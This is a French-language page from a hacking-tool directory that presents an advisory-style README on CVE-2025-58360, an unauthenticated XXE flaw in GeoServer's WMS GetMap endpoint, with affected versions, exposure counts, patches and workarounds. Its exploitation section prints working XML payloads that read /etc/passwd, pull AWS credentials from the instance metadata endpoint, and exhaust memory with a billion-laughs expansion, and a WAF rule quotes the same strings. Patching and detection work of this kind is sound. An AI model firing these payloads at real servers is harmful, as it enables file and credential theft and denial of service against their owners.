Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔓 🛰️ « CVE-2025-58360 » L'endpoint WMS de GeoServer vulnérable à une attaque XXE 🌟

GeoServer

🏷️ Informations de base

  • CVE ID : CVE-2025-58360
  • Publié : 📅 25 novembre 2025
  • Dernière modification : 📅 25 novembre 2025 (encore tout frais au 26 nov.)
  • Type de vulnérabilité : XML External Entity (XXE) – CWE-611
  • Logiciel concerné : GeoServer (serveur géospatial open source écrit en Java)
  • Sévérité : 🔥 Élevée – Score de base CVSS v3.1 7.5
    • Vecteur : AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Exploitation dans la nature : 🟡 Pas encore observée (26 nov. 2025) – mais des PoC publics circulent
  • Authentification requise : ❌ Aucune – entièrement non authentifié
  • Interaction utilisateur requise : ❌ Aucune

🎨 Ce qui rend ce bug spécial (et dangereux)

Il s'agit d'un XXE classique mais dévastateur dans l'endpoint GetMap du Web Map Service (WMS).
Les attaquants peuvent :

  • 📂 Lire auquel le processus GeoServer a accès (, , clés privées, etc.)
Télécharger l’outil
n'importe quel fichier
/etc/passwd
geoserver.xml
  • 🌐 Effectuer une Server-Side Request Forgery (SSRF) pour scanner les réseaux internes ou atteindre des endpoints de métadonnées (p. ex. AWS/GCP)
  • 💣 Déclencher un déni de service avec des attaques par expansion d'entités (« billion laughs »)
  • 🔗 Potentiellement chaîner avec d'autres failles pour un RCE complet (pas direct, mais possible dans des configurations mal sécurisées)
  • 🛡️ Versions affectées (tableau détaillé)

    ComposantVersions vulnérablesCorrigé dansStatut
    GeoServer autonome2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.3, 2.25.6, 2.27.0🔴 Vulnérable
    Docker (osgeo/geoserver)2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.27.0🔴 Vulnérable
    Maven org.geoserver:gs-wms2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Vulnérable
    Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Vulnérable
    GeoServer 2.27.x et plus récent–Déjà corrigé✅ Sûr

    🌍 Exposition mondiale (en temps réel au 26 nov. 2025)

    SourceInstances exposéesNotes
    ZoomEye~49,400recherche app:"GeoServer"
    FOFA~24,000Résultats de l'année écoulée
    Shodan~31,000Port 8080 + correspondance de titre
    GobySec~20,000Scan du réseau public

    → Cela représente des dizaines de milliers de serveurs potentiellement vulnérables exposés sur Internet en ce moment même ! 🌐

    🧨 Procédure technique complète d'exploitation

    Endpoint : POST /geoserver/wms
    Paramètre clé : SLD_BODY (permet un style XML brut)
    Chemin de code vulnérable : L'analyseur XML ne désactive pas la résolution des entités externes → XXE classique.

    f77f64d7c92fd31b29d537f5205da524

    Exemple 1 – Divulgation de fichiers (/etc/passwd)

    root@kitploit:~
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
      <sld:UserLayer>
        <sld:LayerFeatureConstraints>
          <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
        </sld:LayerFeatureConstraints>
      </sld:UserLayer>
    </sld:StyledLayerDescriptor>
    

    → La réponse contient le contenu de /etc/passwd 🎉

    Exemple 2 – SSRF vers des métadonnées internes (exemple AWS)

    root@kitploit:~
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
    

    → Fuit des identifiants AWS temporaires si exécuté sur EC2.

    Exemple 3 – Déni de service Billion Laughs

    root@kitploit:~
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
      <!-- repeat up to lol9 -->
    ]>
    <lol>&lol9;</lol>
    

    → Consomme des gigaoctets de RAM en quelques secondes 💥

    🛠️ Correctifs officiels et téléchargements

    VersionDate de publicationLien de téléchargement
    2.27.025 nov. 2025https://geoserver.org/release/stable/
    2.26.325 nov. 2025Correctif de la branche de maintenance
    2.25.625 nov. 2025Branche supportée plus ancienne

    Utilisateurs de Docker :

    root@kitploit:~
    docker pull osgeo/geoserver:2.27.0
    

    🔧 Contournements (si vous ne pouvez pas patcher immédiatement)

    1. Bloquez les XML dangereux avec une règle WAF/mod_security :
      Refusez les requêtes contenant <!ENTITY ou SYSTEM "file://
    2. Désactivez le paramètre SLD_BODY globalement (si non nécessaire)
    3. Exécutez GeoServer avec un système de fichiers en lecture seule + supprimez les capacités
    4. Placez-le derrière un proxy inverse qui supprime les corps XML pour les utilisateurs non authentifiés

    📢 Références officielles et PoC

    • Entrée NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-58360
    • Avis GeoServer : https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
    • Ticket JIRA : https://osgeo-org.atlassian.net/browse/GEOS-11682
    • PoC public sûr (Python) : https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
    • Modèle Nuclei (détection automatique) : Déjà fusionné dans la branche principale

    ⏰ Chronologie

    DateÉvénement
    Avant nov. 2025Découvert de manière autonome par le scanner IA XBOW
    25 nov. 2025Divulgation coordonnée → correctifs publiés
    25 nov. 2025CVE attribuée et publiée
    26 nov. 2025Les PoC deviennent viraux, les scans d'exposition explosent

    ✨ Derniers mots

    C'est un XXE de manuel qui frappe une plateforme géospatiale largement déployée avec des dizaines de milliers d'instances exposées sur Internet.
    Les correctifs sont sortis le jour même de la divulgation — un immense bravo à l'équipe GeoServer pour sa réactivité ! 🏆
    Mais la fenêtre entre la disponibilité des correctifs et l'exploitation massive se réduit rapidement.

    Si vous utilisez GeoServer → mettez à jour dès aujourd'hui.
    Ne devenez pas le prochain gros titre.

    Restez sécurisé, restez brillant ! 🛡️✨